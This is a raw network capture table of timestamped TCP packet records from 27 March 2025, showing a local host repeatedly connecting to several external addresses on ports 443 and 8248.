Mar 27, 2025 18:30:41.618375063 CET	49793	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:41.618510962 CET	49793	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:41.618522882 CET	443	49793	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:41.802170992 CET	443	49793	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:41.802499056 CET	49793	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:41.802541018 CET	443	49793	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:41.802664042 CET	49793	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:41.802671909 CET	443	49793	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:41.803545952 CET	443	49791	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:41.803698063 CET	49791	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:41.803715944 CET	443	49791	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:41.803798914 CET	49791	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:41.803803921 CET	443	49791	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:41.819989920 CET	8248	49789	185.174.100.76	192.168.2.4
Mar 27, 2025 18:30:42.052113056 CET	443	49793	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:42.052171946 CET	443	49793	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:42.052228928 CET	49793	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:42.053229094 CET	49793	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:42.053258896 CET	443	49793	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:42.288800001 CET	443	49791	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:42.288876057 CET	443	49791	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:42.288927078 CET	49791	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:42.290186882 CET	49791	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:42.290204048 CET	443	49791	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:42.877614021 CET	49764	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:30:43.043421984 CET	8248	49764	185.174.100.76	192.168.2.4
Mar 27, 2025 18:30:43.472951889 CET	49708	443	192.168.2.4	52.113.196.254
Mar 27, 2025 18:30:43.801101923 CET	49709	443	192.168.2.4	131.253.33.254
Mar 27, 2025 18:30:43.985452890 CET	49710	443	192.168.2.4	204.79.197.222
Mar 27, 2025 18:30:55.900398016 CET	49794	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:55.900453091 CET	443	49794	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:55.900571108 CET	49794	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:55.927685022 CET	49754	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:30:55.937114000 CET	49795	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:30:56.074825048 CET	49794	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:56.074856043 CET	443	49794	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:56.093535900 CET	8248	49754	185.174.100.76	192.168.2.4
Mar 27, 2025 18:30:56.105895042 CET	8248	49795	185.174.100.76	192.168.2.4
Mar 27, 2025 18:30:56.106013060 CET	49795	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:30:56.106235027 CET	49795	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:30:56.273991108 CET	8248	49795	185.174.100.76	192.168.2.4
Mar 27, 2025 18:30:56.274429083 CET	49795	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:30:56.274554014 CET	49795	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:30:56.386145115 CET	443	49794	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:56.386512041 CET	49794	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:56.386543989 CET	443	49794	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:56.386682034 CET	49794	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:56.386687040 CET	443	49794	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:56.442346096 CET	8248	49795	185.174.100.76	192.168.2.4
Mar 27, 2025 18:30:56.442707062 CET	8248	49795	185.174.100.76	192.168.2.4
Mar 27, 2025 18:30:56.445987940 CET	49796	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:30:56.446052074 CET	443	49796	172.67.74.152	192.168.2.4
Mar 27, 2025 18:30:56.446167946 CET	49796	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:30:56.446331978 CET	49796	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:30:56.446347952 CET	443	49796	172.67.74.152	192.168.2.4
Mar 27, 2025 18:30:56.493961096 CET	49795	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:30:56.630903006 CET	443	49796	172.67.74.152	192.168.2.4
Mar 27, 2025 18:30:56.631395102 CET	49796	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:30:56.631422997 CET	443	49796	172.67.74.152	192.168.2.4
Mar 27, 2025 18:30:56.631458044 CET	49796	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:30:56.631465912 CET	443	49796	172.67.74.152	192.168.2.4
Mar 27, 2025 18:30:56.863658905 CET	443	49796	172.67.74.152	192.168.2.4
Mar 27, 2025 18:30:56.863724947 CET	443	49796	172.67.74.152	192.168.2.4
Mar 27, 2025 18:30:56.863811970 CET	49796	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:30:56.870579004 CET	49796	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:30:56.870619059 CET	443	49796	172.67.74.152	192.168.2.4
Mar 27, 2025 18:30:56.871685982 CET	49795	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:30:56.874291897 CET	49797	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:56.874372959 CET	443	49797	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:56.874464989 CET	49797	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:56.874645948 CET	49797	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:56.874665022 CET	443	49797	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:56.876331091 CET	443	49794	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:56.876457930 CET	443	49794	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:56.876517057 CET	49794	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:56.877044916 CET	49794	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:56.877060890 CET	443	49794	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:56.889125109 CET	49798	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:56.889208078 CET	443	49798	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:56.889305115 CET	49798	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:56.889458895 CET	49798	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:56.889497042 CET	443	49798	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:57.059907913 CET	443	49797	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:57.060272932 CET	49797	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:57.060349941 CET	443	49797	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:57.060431004 CET	49797	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:57.060446024 CET	443	49797	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:57.080807924 CET	8248	49795	185.174.100.76	192.168.2.4
Mar 27, 2025 18:30:57.197334051 CET	443	49798	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:57.198168993 CET	49798	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:57.198256016 CET	443	49798	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:57.198565960 CET	49798	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:57.198582888 CET	443	49798	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:57.295137882 CET	443	49797	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:57.295197010 CET	443	49797	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:57.295269012 CET	49797	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:57.296570063 CET	49797	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:30:57.296608925 CET	443	49797	104.26.12.205	192.168.2.4
Mar 27, 2025 18:30:57.678798914 CET	443	49798	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:57.678858042 CET	443	49798	104.168.138.190	192.168.2.4
Mar 27, 2025 18:30:57.679090977 CET	49798	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:57.679685116 CET	49798	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:30:57.679723978 CET	443	49798	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:04.064882994 CET	49757	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:04.230160952 CET	8248	49757	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:06.051462889 CET	49799	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:31:06.051549911 CET	443	49799	142.251.40.164	192.168.2.4
Mar 27, 2025 18:31:06.051645994 CET	49799	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:31:06.051896095 CET	49799	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:31:06.051920891 CET	443	49799	142.251.40.164	192.168.2.4
Mar 27, 2025 18:31:06.244030952 CET	443	49799	142.251.40.164	192.168.2.4
Mar 27, 2025 18:31:06.244344950 CET	49799	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:31:06.244385958 CET	443	49799	142.251.40.164	192.168.2.4
Mar 27, 2025 18:31:07.851530075 CET	49800	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:07.851593018 CET	443	49800	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:07.851705074 CET	49800	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:07.853050947 CET	49801	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:07.853240967 CET	49800	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:07.853276968 CET	443	49800	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:08.018439054 CET	8248	49801	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:08.018534899 CET	49801	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:08.018800974 CET	49801	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:08.159420967 CET	443	49800	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:08.159712076 CET	49800	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:08.159753084 CET	443	49800	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:08.159919977 CET	49800	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:08.159931898 CET	443	49800	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:08.184649944 CET	8248	49801	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:08.185002089 CET	49801	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:08.185225010 CET	49801	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:08.351274967 CET	8248	49801	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:08.351526976 CET	8248	49801	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:08.354610920 CET	49802	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:08.354698896 CET	443	49802	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:08.354804039 CET	49802	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:08.354923010 CET	49802	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:08.354943037 CET	443	49802	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:08.396859884 CET	49801	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:08.554009914 CET	443	49802	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:08.554368973 CET	49802	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:08.554447889 CET	443	49802	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:08.554593086 CET	49802	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:08.554609060 CET	443	49802	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:08.643821001 CET	443	49800	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:08.643891096 CET	443	49800	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:08.643974066 CET	49800	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:08.644470930 CET	49800	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:08.644510031 CET	443	49800	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:08.650105953 CET	49803	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:08.650156975 CET	443	49803	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:08.650243998 CET	49803	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:08.650367975 CET	49803	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:08.650382042 CET	443	49803	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:08.797751904 CET	443	49802	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:08.797909975 CET	443	49802	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:08.797996044 CET	49802	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:08.798970938 CET	49802	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:08.799001932 CET	443	49802	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:08.799983025 CET	49801	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:08.801965952 CET	49804	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:08.801989079 CET	443	49804	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:08.802084923 CET	49804	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:08.802342892 CET	49804	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:08.802361965 CET	443	49804	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:08.969144106 CET	443	49803	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:08.969397068 CET	49803	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:08.969404936 CET	443	49803	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:08.969578028 CET	49803	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:08.969580889 CET	443	49803	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:09.001060009 CET	443	49804	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:09.006989002 CET	49804	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:09.007069111 CET	443	49804	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:09.007124901 CET	49804	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:09.007139921 CET	443	49804	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:09.010212898 CET	8248	49801	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:09.242665052 CET	443	49804	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:09.242815018 CET	443	49804	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:09.243002892 CET	49804	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:09.333328962 CET	49804	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:09.333369017 CET	443	49804	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:09.457921028 CET	443	49803	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:09.457998037 CET	443	49803	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:09.458044052 CET	49803	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:09.458508968 CET	49803	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:09.458522081 CET	443	49803	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:14.845309019 CET	49780	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:15.012240887 CET	8248	49780	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:15.385845900 CET	443	49711	204.79.197.222	192.168.2.4
Mar 27, 2025 18:31:16.239103079 CET	443	49799	142.251.40.164	192.168.2.4
Mar 27, 2025 18:31:16.239161015 CET	443	49799	142.251.40.164	192.168.2.4
Mar 27, 2025 18:31:16.239238024 CET	49799	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:31:16.727181911 CET	49799	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:31:16.727262974 CET	443	49799	142.251.40.164	192.168.2.4
Mar 27, 2025 18:31:16.727854013 CET	49805	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:16.727942944 CET	443	49805	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:16.728053093 CET	49805	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:16.728238106 CET	49805	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:16.728275061 CET	443	49805	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:16.729670048 CET	49806	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:16.892895937 CET	8248	49806	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:16.893033028 CET	49806	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:16.893309116 CET	49806	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:17.043824911 CET	443	49805	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:17.044230938 CET	49805	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:17.044328928 CET	443	49805	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:17.044388056 CET	49805	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:17.044405937 CET	443	49805	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:17.056817055 CET	8248	49806	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:17.057044029 CET	49806	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:17.057307959 CET	49806	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:17.220276117 CET	8248	49806	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:17.220689058 CET	8248	49806	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:17.224014997 CET	49807	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:17.224093914 CET	443	49807	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:17.224206924 CET	49807	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:17.224379063 CET	49807	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:17.224416971 CET	443	49807	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:17.269886971 CET	49806	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:17.409971952 CET	443	49807	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:17.410325050 CET	49807	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:17.410392046 CET	443	49807	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:17.410423994 CET	49807	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:17.410438061 CET	443	49807	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:17.563962936 CET	443	49805	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:17.564023972 CET	443	49805	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:17.564343929 CET	49805	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:17.570012093 CET	49805	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:17.570051908 CET	443	49805	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:17.573226929 CET	49808	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:17.573309898 CET	443	49808	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:17.573400974 CET	49808	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:17.573575974 CET	49808	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:17.573611975 CET	443	49808	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:17.671408892 CET	443	49807	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:17.671456099 CET	443	49807	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:17.671566010 CET	49807	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:17.673213005 CET	49807	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:31:17.673245907 CET	443	49807	172.67.74.152	192.168.2.4
Mar 27, 2025 18:31:17.675132990 CET	49806	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:17.684108973 CET	49809	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:17.684158087 CET	443	49809	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:17.684232950 CET	49809	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:17.684366941 CET	49809	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:17.684375048 CET	443	49809	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:17.867484093 CET	443	49809	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:17.879048109 CET	8248	49806	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:17.880705118 CET	443	49808	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:17.892636061 CET	49808	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:17.892692089 CET	443	49808	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:17.892787933 CET	49809	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:17.892826080 CET	443	49809	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:17.892995119 CET	49808	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:17.893008947 CET	443	49808	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:17.893053055 CET	49809	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:17.893059015 CET	443	49809	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:18.100001097 CET	443	49809	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:18.100063086 CET	443	49809	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:18.100224972 CET	49809	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:18.101058006 CET	49809	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:31:18.101079941 CET	443	49809	104.26.12.205	192.168.2.4
Mar 27, 2025 18:31:18.373037100 CET	443	49808	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:18.373245955 CET	443	49808	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:18.373303890 CET	49808	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:18.374074936 CET	49808	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:31:18.374099970 CET	443	49808	104.168.138.190	192.168.2.4
Mar 27, 2025 18:31:26.830193043 CET	49789	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:26.994237900 CET	8248	49789	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:28.047456980 CET	49764	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:28.213303089 CET	8248	49764	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:41.094980001 CET	49754	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:41.260838985 CET	8248	49754	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:42.095174074 CET	49795	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:42.262351036 CET	8248	49795	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:49.235992908 CET	49757	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:49.399597883 CET	8248	49757	185.174.100.76	192.168.2.4
Mar 27, 2025 18:31:54.017148972 CET	49801	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:31:54.182508945 CET	8248	49801	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:00.016459942 CET	49780	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:00.183331013 CET	8248	49780	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:02.892445087 CET	49806	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:03.055277109 CET	8248	49806	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:05.009932995 CET	49810	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:05.009974957 CET	443	49810	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:05.010061026 CET	49810	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:05.011883974 CET	49810	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:05.011898041 CET	443	49810	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:05.013359070 CET	49811	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:05.176572084 CET	8248	49811	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:05.176790953 CET	49811	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:05.177021980 CET	49811	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:05.317228079 CET	443	49810	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:05.317620039 CET	49810	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:05.317650080 CET	443	49810	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:05.317758083 CET	49810	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:05.317764044 CET	443	49810	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:05.340961933 CET	8248	49811	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:05.341487885 CET	49811	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:05.341584921 CET	49811	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:05.505589962 CET	8248	49811	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:05.505930901 CET	8248	49811	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:05.509958982 CET	49812	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:05.510035038 CET	443	49812	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:05.510118961 CET	49812	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:05.510308981 CET	49812	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:05.510341883 CET	443	49812	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:05.548631907 CET	49811	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:05.695543051 CET	443	49812	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:05.695842981 CET	49812	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:05.695908070 CET	443	49812	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:05.696053982 CET	49812	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:05.696069002 CET	443	49812	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:05.880788088 CET	443	49810	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:05.880887985 CET	443	49810	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:05.880947113 CET	49810	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:05.882193089 CET	49810	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:05.882209063 CET	443	49810	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:05.930535078 CET	443	49812	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:05.930598974 CET	443	49812	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:05.930649042 CET	49812	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:05.938007116 CET	49812	443	192.168.2.4	172.67.74.152
Mar 27, 2025 18:32:05.938039064 CET	443	49812	172.67.74.152	192.168.2.4
Mar 27, 2025 18:32:05.948018074 CET	49811	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:32:05.954085112 CET	49813	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:05.954121113 CET	443	49813	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:05.954184055 CET	49813	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:05.954402924 CET	49813	443	192.168.2.4	104.168.138.190
Mar 27, 2025 18:32:05.954418898 CET	443	49813	104.168.138.190	192.168.2.4
Mar 27, 2025 18:32:05.963629007 CET	49814	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:05.963641882 CET	443	49814	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:05.963694096 CET	49814	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:05.963977098 CET	49814	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:05.963988066 CET	443	49814	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:06.150022984 CET	443	49814	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:06.150310993 CET	49814	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:06.150342941 CET	443	49814	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:06.150507927 CET	49814	443	192.168.2.4	104.26.12.205
Mar 27, 2025 18:32:06.150512934 CET	443	49814	104.26.12.205	192.168.2.4
Mar 27, 2025 18:32:06.152717113 CET	8248	49811	185.174.100.76	192.168.2.4
Mar 27, 2025 18:32:06.267980099 CET	443	49813	104.168.138.190	192.168.2.4
